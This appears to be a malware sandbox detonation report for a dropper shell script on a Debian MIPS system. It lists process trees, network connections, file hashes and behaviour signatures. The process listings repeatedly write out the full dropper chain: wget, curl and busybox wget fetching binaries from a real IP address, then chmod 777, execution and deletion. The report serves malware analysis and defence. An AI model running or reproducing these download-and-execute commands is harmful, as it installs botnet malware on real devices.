[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/chmod
[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/rm
[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/wget
[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/chmod
[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/rm
[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/wget
[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/chmod
[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/rm
[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:39
Reported
2024-11-20 03:42
Platform
debian9-mipsel-20240418-en
Max time kernel
109s
Max time network
111s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
Processes
/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
